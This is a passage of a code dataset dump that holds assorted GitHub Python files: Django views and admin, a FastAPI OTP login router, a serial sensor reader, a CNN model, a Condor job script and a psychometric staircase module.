parser.add_argument('pub_date', type=str, help='Article publication date')\n parser.add_argument('author', type=int, help='Article author ID')\n parser.add_argument('category', type=str, help='Article category')\n parser.add_argument('released', type=bool, help='Article released')\n\n def handle(self, *args, **kwargs):\n pk = kwargs.get('pk')\n article = Article.objects.filter(pk=pk).first()\n if kwargs.get('title'):\n article.title = kwargs.get('title')\n if kwargs.get('content'):\n article.content = kwargs.get('content')\n if kwargs.get('pub_date'):\n article.pub_date = kwargs.get('pub_date')\n if kwargs.get('author'):\n article.author = kwargs.get('author')\n if kwargs.get('category'):\n article.category = kwargs.get('category')\n if kwargs.get('released'):\n article.released = kwargs.get('released')\n article.save()\n 
self.stdout.write(f'{article}')\n\n","repo_name":"AndreySozinov/Django_learning_project1","sub_path":"project_one/thirdapp/management/commands/update_article.py","file_name":"update_article.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22888082646","text":"#!/usr/bin/env python\n\nimport os\nimport argparse\n\nimport dagmanager\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Prints vegetables of your choosing')\n parser.add_argument('--length', dest='length',\n default=10,\n help='Number of random numbers to be written to file')\n args = parser.parse_args()\n\n # Create CondorExecutable for example_script.py\n ex = dagmanager.CondorExecutable(name='save_numbers_script', path='{}/write_num_to_file.py'.format(os.getcwd()))\n # Create CondorJob that will pass arguments to example_script.py\n job = dagmanager.CondorJob(name='job', condorexecutable=ex)\n job.add_arg('--length {}'.format(args.length))\n # Create DagManager to build and submit jobs\n manager = dagmanager.DagManager(name='manager',\n condor_data_dir='{}/example_condor_dir'.format(os.getcwd()),\n condor_scratch_dir='{}/example_condor_dir'.format(os.getcwd()))\n manager.add_job(job)\n manager.build_submit()\n","repo_name":"jrbourbeau/dagmanager","sub_path":"examples/example_1/example_dagmanager_script.py","file_name":"example_dagmanager_script.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71315555828","text":"from django.contrib import admin\n\n# Register your models here.\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom .models import CustomUser\n\n\nclass CustomUserAdmin(UserAdmin):\n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n model = CustomUser\n list_display = ['name', 'city', 'phone_number', 'email', 'photo']\n list_display_links = ['name', 'city', 'phone_number', 'email', 'photo']\n\n add_fieldsets = (\n *UserAdmin.add_fieldsets,\n (\n 'Пользовательская информация',\n {\n 'fields': (\n 'name',\n 'city',\n 'phone_number',\n 'status',\n 'photo',\n )\n }\n )\n )\n fieldsets = (\n *UserAdmin.fieldsets,\n (\n 'Пользовательская информация',\n {\n 'fields': (\n 'name',\n 'city',\n 'phone_number',\n 'status',\n 'photo',\n )\n }\n )\n )\n\n\nadmin.site.register(CustomUser, CustomUserAdmin)\n","repo_name":"Zarathustra5/fastbarter","sub_path":"fastbarter/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34614201526","text":"import os\nimport glob\nimport numpy as np\nimport operator\nimport matplotlib.image as mpimg\nimport re\n\ndef grep(pat, txt, ind):\n r = re.search(pat, txt)\n return int(r.group(1))\n\nsave_images_dir = 'grid_images'\nif not os.path.exists(save_images_dir):\n os.makedirs(save_images_dir)\nimg_path = 'Desktop/sorted_clustered_images'\nfiles_lst = os.listdir(img_path)\nfiles_lst.sort(key=lambda txt: grep(r\"(\\d+)\\.(\\d+)_(\\d+)\\.png\", txt, 1))\nprint(files_lst)\n\ndef create_image_grid(images, grid_size=None):\n assert images.ndim == 3 or images.ndim == 4\n num, img_w, img_h, img_d = images.shape[0], images.shape[1], images.shape[2], images.shape[3]\n\n grid_w, grid_h = tuple(grid_size)\n\n grid = 
np.zeros([grid_h * img_h, grid_w * img_w] + [img_d], dtype=images.dtype)\n for idx in range(num):\n x = (idx % grid_w) * img_w\n y = (idx // grid_w) * img_h\n grid[y : y + img_h, x : x + img_w, :] = images[idx]\n return grid\nsave_\n","repo_name":"VITA-Group/BlackBoxGANCollapse","sub_path":"stylegan/monte_carlo/save_image_grid.py","file_name":"save_image_grid.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"4845125615","text":"from create_models import Publisher, Shop, Book, Stock, Sale\nimport json\n\n\ndef insert_data(engine, Session):\n with Session() as session:\n with open('fixtures/tests_data.json', encoding='utf-8') as fd:\n data = json.load(fd)\n for record in data:\n model = {\n 'publisher': Publisher,\n 'shop': Shop,\n 'book': Book,\n 'stock': Stock,\n 'sale': Sale}[record.get('model')]\n session.add(model(id=record.get('pk'), **record.get('fields')))\n session.commit()\n print('Данные добавлены.')\n print()\n","repo_name":"alekgs/python_progs","sub_path":"netology/DataBase/SQLAlchemy/insert_db.py","file_name":"insert_db.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10546169097","text":"# This file contains various settings for running and testing different interactomes, weighting parameters, and so on.\n\n#import toxcast_utils as t_utils\n\nVERSION = ''\n\nINTERACTOMES = {}\n\n# may specify the path to the evidence file used for this version, otherwise the default is used\nEVIDENCE_FILES = {}\n\n# zscore penalty versions. Adds a cost to the super-source -> rec and from the tf -> super-target based on the z-score of the assay\nZSCORE_PENALTY = []\n\n# bulk add these versions\nfor version in [\"2018_01-toxcast-d2d-p1_5-u1_25\"]:\n INTERACTOMES[version] = \"./inputs/2018_01-toxcast-net/2019-02-18-human-ppi-d2d-dir-weighted-cap0_99.txt\"\n ZSCORE_PENALTY.append(version)\n EVIDENCE_FILES[version] = \"./inputs/2018_01-toxcast-net/2018_01pathlinker-nokegg.tsv\"\n\nfor version in [\"2018_01-toxcast-p1_5\"]:\n INTERACTOMES[version] = \"./inputs/2018_01-toxcast-net/2019-02-18-human-ppi-weighted-cap0_99.txt\"\n ZSCORE_PENALTY.append(version)\n EVIDENCE_FILES[version] = \"./inputs/2018_01-toxcast-net/2018_01pathlinker-nokegg.tsv\"\n\nALLOWEDVERSIONS = sorted(INTERACTOMES.keys())\n\n# -log of this number is added to each edge before running cyclinker.\n# this effectively penalizes each path by the # of edges in the path * -log(edge_penalty)\nEDGE_PENALTIES = {\n \"2018_01-toxcast-p1_5\": 1.5,\n \"2018_01-toxcast-d2d-p1_5-u1_25\": 1.5,\n}\n\nUNDIR_PENALTIES = {\n \"2018_01-toxcast-d2d-p1_5-u1_25\": 1.25,\n}\n\n## DATADIR is the path to the data/ directory checked into SVN. 
\nDATADIR = '/data/jeff-law/data/svn-data'\nPATHLINKERDATADIR = '/data/jeff-law/projects/2015-03-pathlinker/data/pathway-specific-interactomes'\n# populate the interactomes paths\n#for version in INTERACTOMES:\n# if \"%s\" in INTERACTOMES[version]:\n# if version in [\"netpath-pathlinker-signaling-children-reg\", \"kegg-pathlinker-signaling-children-reg\"]:\n# INTERACTOMES[version] = INTERACTOMES[version] % PATHLINKERDATADIR\n# else:\n# INTERACTOMES[version] = INTERACTOMES[version] % DATADIR\n\n# these are specified by input options\nINPUTSPREFIX = ''\nRESULTSPREFIX = ''\nREC_TFS_FILE = \"%s/rec-tfs/%s-rec-tfs.txt\"\n# Instead of create a different interactome for each version, I will simply post-process the output of cyclinker\n#INTERACTOME_FILES = \"%s/interactome/%s-interactome.txt\"\n# follows the convention inputs/version/version-interactome.txt where version is the version name\nSPLIT_REC_TFS_INTERACTOME = '%s/%s-interactome.txt'\nCHEMICAL_MAP = ''\n#chemDSStoName, chemNametoDSS = t_utils.getChemicalNameMaps()\n# this is currently the 'scope' we are using to generate the random networks\n# 'permute-dir-undir' randomly swaps edges separately in the directed and undirected graphs\nDEFAULT_SCOPE = \"permute-dir-undir\"\n\n\ndef set_version(version):\n global VERSION, RESULTSPREFIX, INPUTSPREFIX, INTERACTOME\n global EDGE_PENALTY, REC_TFS_PENALTY, SPLIT_REC_TFS_INTERACTOME\n\n VERSION = version\n print(\"Using version %s\" % (VERSION))\n\n INPUTSPREFIX = \"inputs/versions/%s/\" % VERSION\n RESULTSPREFIX = \"outputs/%s/weighted/\" % VERSION\n INTERACTOME = INTERACTOMES[VERSION]\n # Also create a new \n if VERSION in UNDIR_PENALTIES:\n INTERACTOME = \"%s/%s-interactome-undir-penalty.txt\" % (INPUTSPREFIX, VERSION)\n\n # also setup some other variables for running cyclinker for each version\n if VERSION in ZSCORE_PENALTY:\n REC_TFS_PENALTY = True\n else:\n REC_TFS_PENALTY = False\n if VERSION in EDGE_PENALTIES:\n EDGE_PENALTY = EDGE_PENALTIES[VERSION]\n else:\n EDGE_PENALTY = None\n\n return INPUTSPREFIX, RESULTSPREFIX, INTERACTOME\n","repo_name":"Murali-group/tox_signaling_networks","sub_path":"src/toxcast_settings.py","file_name":"toxcast_settings.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74079311668","text":"import base64\nimport os\nfrom glob import glob\nfrom io import BytesIO\n\nfrom PIL import Image\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom django.urls import reverse\n\nfrom .models import Category, Post,Store\nfrom my_tennis_club import settings\n\n\n\ndef deals(request):\n data={}\n return render(request, 'store/deals.html', context=data)\n\n\ndef stores(request):\n\n posts = Post.objects.all()\n stores = Store.objects.all()\n # noons=Post.objects.filter(store__slug__contains='no')\n # print(noons)\n images_path = os.path.join(settings.STATIC_ROOT, 'img/stores_images/')\n urlss = os.path.join(settings.STATIC_ROOT, 'img', 'urls_txt.css')\n urlss = [url.strip() for url in open(urlss, 'r').readlines()]\n # images = glob(images_path + '/*.*')\n # images_list = []\n # for image in images:\n # image = Image.open(image)\n # image64 = image_to_base64(image)\n # images_list.append(image64)\n\n flags = os.listdir(os.path.join(settings.STATIC_ROOT, \"img/stores_images\"))\n\n flags = ['img/stores_images/' + fl for fl in flags]\n data = {\n 
'posts': posts,\n 'stores': stores,\n 'new_stores': stores,\n 'new_blogs': stores,\n 'page_title': DEFAULT_TITLE,\n 'images_list': urlss,\n 'images_path': urlss,\n 'flags': [],\n 'crumbs' : [\n (\"جميع المتاجر\", reverse('stores')),\n (\"جميع المتاجر\", reverse('stores')),\n (\"جميع المتاجر\", reverse('stores')),\n\n ],\n\n }\n return render(request, 'store/stores.html', context=data)\n\n\ndef image_to_base64(image):\n buff = BytesIO()\n image.save(buff, format=\"PNG\")\n img_str = base64.b64encode(buff.getvalue())\n img_str = img_str.decode(\"utf-8\") # convert to str and cut b'' chars\n return img_str\n\n\nimages_path = os.path.join(settings.STATIC_ROOT, 'img/stores_images')\n\nimages = glob(images_path + '\\*.*')\nimages_list = []\nfor image in images:\n if 'html' in image:\n continue\n image = Image.open(image)\n image64 = image_to_base64(image)\n images_list.append(image64)\n\n\nDEFAULT_TITLE='موقع كوبونات سيلز لجميع اكواد الخصم الحصرية'\ndef tgarba(request):\n # print('images_path', images_path)\n # print('rooot', settings.MEDIA_ROOT)\n\n template = loader.get_template('store/test.html')\n posts = Post.objects.all()\n stores = Store.objects.all()\n images_path = os.path.join(settings.STATIC_ROOT, 'img/stores_images/')\n urlss = os.path.join(settings.STATIC_ROOT, 'img','urls_txt.css')\n urlss=[url.strip() for url in open(urlss,'r').readlines()]\n print(urlss)\n # images = glob(images_path + '/*.*')\n # images_list = []\n # for image in images:\n # image = Image.open(image)\n # image64 = image_to_base64(image)\n # images_list.append(image64)\n\n flags = os.listdir(os.path.join(settings.STATIC_ROOT, \"img/stores_images\"))\n\n flags = ['img/stores_images/' + fl for fl in flags]\n data = {\n 'posts': posts,\n 'stores': stores,\n 'images_list': urlss,\n 'images_path': urlss,\n 'flags': [],\n\n }\n print(f'current dir {images}')\n return render(request, 'store/test.html', context=data)\n\n\ndef category_detail(slug):\n template = loader.get_template('store/stores.html')\n cat = Category.objects.get(slug=slug)\n print(cat)\n return HttpResponse(template.render())\n\n\ndef single_store(request,slug):\n posts = Post.objects.filter(store__slug=slug)\n\n\n stores = Store.objects.all()\n store = Store.objects.get(slug=slug)\n # Post.objects.filter(las)\n print(f'txt {store.text}')\n # noons=Post.objects.filter(store__slug__contains='no')\n # print(noons)\n for post in posts:\n print(post.last_modified,'ssss')\n images_path = os.path.join(settings.STATIC_ROOT, 'img/stores_images/')\n urlss = os.path.join(settings.STATIC_ROOT, 'img', 'urls_txt.css')\n urlss = [url.strip() for url in open(urlss, 'r').readlines()]\n # images = glob(images_path + '/*.*')\n # images_list = []\n # for image in images:\n # image = Image.open(image)\n # image64 = image_to_base64(image)\n # images_list.append(image64)\n\n flags = os.listdir(os.path.join(settings.STATIC_ROOT, \"img/stores_images\"))\n\n flags = ['img/stores_images/' + fl for fl in flags]\n data = {\n 'posts': posts,\n 'store': store,\n 'store_html': f'{store.html}.html' if store.html else '',\n 'posts_count': len(posts),\n 'stores': stores,\n 'new_stores': stores,\n 'page_title': DEFAULT_TITLE,\n 'new_blogs': stores,\n 'images_list': urlss,\n 'images_path': urlss,\n 'flags': [],\n\n }\n return render(request, 'store/store.html', 
context=data)\n","repo_name":"fahmy554/site_base","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20986180152","text":"import json\nimport logging\nimport os\nimport sys\nimport time\nfrom collections import OrderedDict\n\nlogger = logging.getLogger(\"cloudbot\")\n\n\nclass Config(OrderedDict):\n \"\"\"\n :type filename: str\n :type path: str\n :type bot: cloudbot.bot.CloudBot\n \"\"\"\n\n def __init__(self, bot, *args, **kwargs):\n \"\"\"\n :type bot: cloudbot.bot.CloudBot\n :type args: list\n :type kwargs: dict\n \"\"\"\n super().__init__(*args, **kwargs)\n self.filename = \"config.json\"\n self.path = os.path.abspath(self.filename)\n self.bot = bot\n self.update(*args, **kwargs)\n\n self._api_keys = {}\n\n # populate self with config data\n self.load_config()\n\n def get_api_key(self, name, default=None):\n try:\n return self._api_keys[name]\n except LookupError:\n self._api_keys[name] = value = self.get('api_keys', {}).get(name, default)\n return value\n\n def load_config(self):\n \"\"\"(re)loads the bot config from the config file\"\"\"\n self._api_keys.clear()\n if not os.path.exists(self.path):\n # if there is no config, show an error and die\n logger.critical(\"No config file found, bot shutting down!\")\n print(\"No config file found! Bot shutting down in five seconds.\")\n print(\"Copy 'config.default.json' to 'config.json' for defaults.\")\n print(\"For help, see http://git.io/cloudbotirc. Thank you for using CloudBot!\")\n time.sleep(5)\n sys.exit()\n\n with open(self.path) as f:\n data = json.load(f, object_pairs_hook=OrderedDict)\n\n self.update(data)\n logger.debug(\"Config loaded from file.\")\n\n # reload permissions\n if self.bot.connections:\n for connection in self.bot.connections.values():\n connection.permissions.reload()\n\n def save_config(self):\n \"\"\"saves the contents of the config dict to the config file\"\"\"\n with open(self.path, 'w') as f:\n json.dump(self, f, indent=4)\n\n logger.info(\"Config saved to file.\")\n","repo_name":"irchelp-brasil/CloudBot","sub_path":"cloudbot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"17111240527","text":"import serial\nfrom time import sleep\n\n\nser = serial.Serial(\n port='/dev/ttyS0',\n baudrate=9600,\n timeout=1\n)\n\n\nrequest = bytes([0xFF, 0x01, 0x86, 0x00, 0x00, 0x00, 0x00, 0x00, 0x79])\n\ntry:\n while True:\n ser.write(request)\n\n response = ser.read(9)\n res = list(response)\n print(res)\n print(res[2] * 256 + res[3])\n sleep(1)\nexcept Exception as e:\n print(e)\nfinally:\n ser.close()\n","repo_name":"ClimateNetTumoLabs/raspberry_soft","sub_path":"OldFolders/MH_Z16/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42890715593","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/2/15 9:20\n# @Author : Bilon\n# @File : 进程间通信示例.py\nimport multiprocessing\nimport time\n\n\n# 我们虚拟一个取词和词典进程间的通信\ndef ocr(que):\n for value in ['one', 'two', 'three']:\n print('完成取词...')\n que.put(value) # 将数据送出到进程共享队列\n time.sleep(1)\n\n\ndef dic(que):\n d = {'one': '一', 'two': '二', 'three': '三'}\n while True:\n value = que.get() # 从进程共享队列获取到数据\n print(value, ':', d[value], sep='')\n\n\nif 
__name__ == '__main__':\n que = multiprocessing.Queue() # 创建进程共享队列\n process1 = multiprocessing.Process(target=ocr, args=(que,))\n process2 = multiprocessing.Process(target=dic, args=(que,))\n process1.start()\n process2.start()\n\n process1.join() # 等待进程process1结束\n process2.terminate() # 终止进程\n","repo_name":"dopqob/Python","sub_path":"Python学习笔记/进程丨线程丨协程/进程间通信示例.py","file_name":"进程间通信示例.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26325036548","text":"\nfrom fastapi import Depends,status,HTTPException,APIRouter,Header\nfrom typing import Union\nfrom sqlalchemy.orm import Session\nfrom model import *\nfrom schemas import OtpSchema, UserSchema, LoginSchema\nfrom fastapi_jwt_auth import AuthJWT\nfrom fastapi_mail import FastMail, MessageSchema\nfrom .email_conf import conf\nfrom db import SessionLocal\nimport random\nfrom starlette.requests import Request\nfrom datetime import datetime,timedelta\n\nauth_router=APIRouter(\n prefix='/auth',\n tags=['auth']\n)\n\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n@auth_router.get('/')\nasync def hello(Authorize:AuthJWT=Depends()):\n\n try:\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid Token\"\n )\n\n return {\"message\":\"Hello World\"}\n\n@auth_router.post(\"/register\", status_code = status.HTTP_201_CREATED )\ndef register_user(user:UserSchema, db: Session = Depends(get_db)):\n db_email=db.query(User).filter(User.email==user.email).first()\n\n if db_email is not None:\n return HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"User with the email already exists\"\n )\n\n db_username=db.query(User).filter(User.username==user.username).first()\n\n if db_username is not None:\n return HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"User with the username already exists\"\n )\n\n db_number=db.query(User).filter(User.phone_number==user.phone_number).first()\n if db_number is not None:\n return HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"User with the number already exists\"\n )\n\n new_user = User(username = user.username, email= user.email, name = user.name, phone_number = user.phone_number)\n db.add(new_user)\n db.commit()\n return HTTPException(status_code=status.HTTP_201_CREATED,\n detail=\"User Created\"\n )\n\n@auth_router.get(\"/user/{username}\")\ndef get_user(username:str, db: Session = Depends(get_db)):\n if username:\n user = db.query(User).filter(User.username==username).first()\n db.close() \n if user:\n return user\n else:\n raise HTTPException(status_code=404, detail=\"User not found\")\n\n@auth_router.get(\"/users/\")\ndef get_users(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n users = db.query(User).offset(skip).limit(limit).all()\n if users is None:\n raise HTTPException(status_code=404, detail=\"User not found\")\n return users\n\n@auth_router.post(\"/login\", status_code=status.HTTP_200_OK)\nasync def send_otp(user:LoginSchema,request: Request,db: Session = Depends(get_db)):\n db_user = db.query(User).filter(User.email==user.email).first()\n if db_user is None:\n return HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"User with this Email dose not exists\"\n )\n otp_value = str(random.randint(1000 , 9999))\n db_otp = db.query(Otp).filter(Otp.user_id ==db_user.user_id)\n otp_check = db_otp.first()\n if 
otp_check:\n db_otp.update({\"otp\":otp_value,\"otp_exp\":datetime.now() + timedelta(minutes=5)})\n db.commit()\n else:\n db_otp = Otp(otp=otp_value,otp_exp =datetime.now() + timedelta(minutes=5) ,user_id = db_user.user_id)\n # db_otp = Otp(otp=otp_value,user_id = db_user.user_id)\n db.add(db_otp)\n db.commit()\n if db_user:\n message = MessageSchema(\n subject=\"Fastapi-Mail module\",\n recipients=[user.email],\n body=f\"Your otp is {otp_value}\",\n subtype=\"html\"\n ) \n fm = FastMail(conf)\n await fm.send_message(message)\n print(message)\n request.session[\"email\"] = user.dict().get('email')\n return HTTPException(status_code=status.HTTP_200_OK,\n detail={\"data\":\"email sended\",\"email\":user.email}\n )\n\n@auth_router.post(\"/verify\", status_code=200)\nasync def login(otp:OtpSchema,request: Request, Authorize:AuthJWT=Depends(),db: Session = Depends(get_db),email: Union[str, None] = Header(default=None)):\n # email = request.session.get(\"email\", None)\n print(email)\n db_user = db.query(User).filter(User.email==email).first()\n db_otp = db.query(Otp).filter(Otp.user_id == db_user.user_id)\n otp_check = db_otp.first()\n if otp.otp != otp_check.otp:\n raise HTTPException(status_code=404, detail=\"Wrong OTP\")\n # if otp_check.otp_exp < datetime.now():\n # db_otp.update({\"otp\":None})\n # db.commit()\n # raise HTTPException(status_code=404, detail=\"otp Expired\")\n if otp_check:\n db_otp.update({\"otp\":None})\n db.commit()\n access_token=Authorize.create_access_token(subject=db_user.email)\n refresh_token=Authorize.create_refresh_token(subject=db_user.email)\n response={\n \"access\":access_token,\n \"refresh\":refresh_token\n }\n return HTTPException(status_code=status.HTTP_200_OK,\n detail= response\n )\n","repo_name":"tarun-brainerhub/python-samples","sub_path":"chat application backend (fastapi)/User/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"32933102243","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nimport numpy as np\nimport math\nfrom resnet import resnet, ResNet, count_parameters, init_weights, device, test_tensor\n\n\nclass CNN(nn.Module):\n def __init__(self, out_num):\n super(CNN, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(in_channels=1, out_channels=8,\n kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(num_features=8),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2)\n )\n\n self.layer2 = nn.Sequential(\n nn.Conv2d(in_channels=8, out_channels=16,\n kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(num_features=16),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2)\n )\n\n self.layer3 = nn.Sequential(\n nn.Conv2d(in_channels=16, out_channels=32,\n kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(num_features=32),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2)\n )\n\n self.lstm = nn.LSTM(input_size=16, hidden_size=16, batch_first=True)\n\n self.layer4 = nn.Sequential(\n nn.Conv2d(in_channels=32, out_channels=32,\n kernel_size=3, stride=1, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2),\n nn.Dropout(0.5)\n )\n\n self.fc1 = nn.Sequential(\n nn.Linear(in_features=32*21*8, out_features=2048),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5)\n )\n\n self.fc3 = nn.Linear(in_features=2048, out_features=out_num)\n\n self.dropout = nn.Dropout(0.5)\n self.activation = F.softmax\n\n def forward(self, x):\n out = 
self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n\n out = out.view(-1, 43, 16)\n out, _ = self.lstm(out)\n\n out = out.contiguous().view(-1, 32, 43, 16)\n out = self.layer4(out)\n\n out = out.contiguous().view(out.size()[0], -1)\n out = self.fc1(out)\n out = self.fc3(out)\n out = self.activation(out, dim=1)\n\n return out\n\n\nclass OrchMatchNet(nn.Module):\n def __init__(self, out_num, model_select):\n super(OrchMatchNet, self).__init__()\n if model_select == 'cnn':\n self.net = CNN(out_num)\n elif model_select == 'resnet':\n self.net = ResNet(num_classes=out_num)\n\n def forward(self, x):\n out = self.net(x)\n\n return out\n\n\ncnn = CNN(out_num=505)\ninit_weights(cnn)\ncnn.to(device)\n\nprint(\"Network output shape:\")\nprint(cnn(test_tensor).shape)\n\ncount_parameters(cnn)\n","repo_name":"Waffle-Liu/DeepOrchestraion","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71459741111","text":"# GUI (Graphical User Interface)\n# Tkinter (TK Interface)\nimport tkinter as tk\nfrom tkinter import ttk\nimport os\n\ndef evento_click():\n boton1.config(text='Boton presionado')\n boton2 = ttk.Button(ventana, text='Nuevo boton')\n boton2.pack()\n print('Ejecucion del evento')\n\n# Crear objecto\nventana = tk.Tk()\n# MOdificar el tamaño de la ventana\nventana.geometry('800x500')\n# Cambiar el nombre de la ventana\nventana.title('Hola Mundo')\n# Cambiar icono\ndirecion = os.getcwd()\nventana.iconbitmap(direcion + '\\icono\\icono.ico')\n# Creacion de boton\nboton1 = ttk.Button(ventana, text='Boton de click', command=evento_click)\n# El pack layout manager muestra los objectos como botones\nboton1.pack()\n# Inicar ventana\nventana.mainloop()\n","repo_name":"KUSHIRO13/Universidad_Python_con_Frameworks_Django_Flask_etc_71hrs","sub_path":"Tkinters/hola_mundo.py","file_name":"hola_mundo.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74093490548","text":"import math, time\nimport numpy as np\nfrom random import randrange\nfrom kivy.uix.screenmanager import Screen, ScreenManager, FadeTransition\nfrom kivy.core.window import Window\nfrom kivy.app import App\nfrom kivy.properties import ObjectProperty\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.storage.jsonstore import JsonStore\nfrom kivy import platform\nimport threading\n\nWindow.fullscreen = 'auto'\n\ndef cartesian(arrays, out=None):\n \"\"\"Generate a cartesian product of input arrays.\n\n Parameters\n -----------------\n arrays: list of array-like \n 1-D arrays to form the cartesian product of.\n out: ndarray\n Array to place the cartesian product in.\n\n Returns \n -----------------\n out: ndarray\n 2-D array of shape (M, len(arrays)) containing cartesian products\n formed of input arrays.\n\n \"\"\"\n arrays = [np.asarray(x) for x in arrays]\n shape = (len(x) for x in arrays)\n dtype = arrays[0].dtype\n\n ix = np.indices(shape)\n ix = ix.reshape(len(arrays), -1).T\n\n if out is None:\n out = np.empty_like(ix, dtype = dtype)\n\n for n, arr in enumerate(arrays):\n out[:, n] = arrays[n][ix[:,n]]\n\n return out\n\n\"\"\"\nCopyright © 2016, N. 
Niehof, Radboud University Nijmegen\n\nPsiMarginal is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nPsiMarginal is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with PsiMarginal. If not, see .\n\"\"\"\n\ndef pf(parameters, psyfun='cGauss'):\n \"\"\"Generate conditional probabilities from psychometric function.\n\n Arguments\n ---------\n parameters: ndarray (float64) containing parameters as columns\n mu : threshold\n\n sigma : slope\n\n gamma : guessing rate (optional), default is 0.2\n\n lambda : lapse rate (optional), default is 0.04\n\n x : stimulus intensity\n\n psyfun : type of psychometric function.\n 'cGauss' cumulative Gaussian\n\n 'Gumbel' Gumbel, aka log Weibull\n\n Returns\n -------\n 1D-array of conditional probabilities p(response | mu,sigma,gamma,lambda,x)\n \"\"\"\n\n # Unpack parameters\n if np.size(parameters, 1) == 5:\n [mu, sigma, gamma, llambda, x] = np.transpose(parameters)\n elif np.size(parameters, 1) == 4:\n [mu, sigma, llambda, x] = np.transpose(parameters)\n gamma = llambda\n elif np.size(parameters, 1) == 3:\n [mu, sigma, x] = np.transpose(parameters)\n gamma = 0.2\n llambda = 0.04\n else: # insufficient number of parameters will give a flat line\n psyfun = None\n gamma = 0.2\n llambda = 0.04\n # Psychometric function\n ones = np.ones(np.shape(mu))\n if psyfun == 'cGauss':\n # F(x; mu, sigma) = Normcdf(mu, sigma) = 1/2 * erfc(-sigma * (x-mu) /sqrt(2))\n z = np.divide(np.subtract(x, mu), sigma)\n p = 0.5 * np.array([math.erfc(-zi / np.sqrt(2)) for zi in z])\n elif psyfun == 'Gumbel':\n # F(x; mu, sigma) = 1 - exp(-10^(sigma(x-mu)))\n p = ones - np.exp(-np.power((np.multiply(ones, 10.0)), (np.multiply(sigma, (np.subtract(x, mu))))))\n elif psyfun == 'Weibull':\n # F(x; mu, sigma)\n p = 1 - np.exp(-(np.divide(x, mu)) ** sigma)\n else:\n # flat line if no psychometric function is specified\n p = np.ones(np.shape(mu))\n y = gamma + np.multiply((ones - gamma - llambda), p)\n return y\n\nclass Psi:\n \"\"\"Find the stimulus intensity with minimum expected entropy for each trial, to determine the psychometric function.\n\n Psi adaptive staircase procedure for use in psychophysics.\n\n Arguments\n ---------\n stimRange :\n range of possible stimulus intensities.\n\n Pfunction (str) : type of psychometric function to use.\n 'cGauss' cumulative Gaussian\n\n 'Gumbel' Gumbel, aka log Weibull\n\n nTrials :\n number of trials\n\n threshold :\n (alpha) range of possible threshold values to search\n\n thresholdPrior (tuple) : type of prior probability distribution to use.\n Also: slopePrior, 